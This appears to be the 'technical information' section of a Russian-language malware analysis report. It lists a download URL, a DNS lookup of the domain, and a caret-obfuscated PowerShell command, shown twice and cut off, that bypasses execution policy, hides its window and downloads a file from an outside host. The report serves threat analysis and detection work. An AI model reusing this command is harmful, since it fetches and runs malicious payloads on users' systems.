Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oW^E^r^S^HE^LL.^E^XE -E^Xe^Cut^IO^N^POli^C^Y BypaSs ^-n^oPR^OFiLe^ -wIN^dO^ws^tY^L^e Hid^DE^N ^(n^ew-obj^Ec^t sYS^teM.net.^WeBCli^EnT^).DOwnLO^ad^FI^le('http://www.zoerpoled.to...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^oW^E^r^S^HE^LL.^E^XE -E^Xe^Cut^IO^N^POli^C^Y BypaSs ^-n^oPR^OFiLe^ -wIN^dO^ws^tY^L^e Hid^DE^N ^(n^ew-obj^Ec^t sYS^teM.net.^WeBCli^EnT^).DOwnLO^ad^FI^le('http://www.zoerpoled.to...' (со скрытым окном)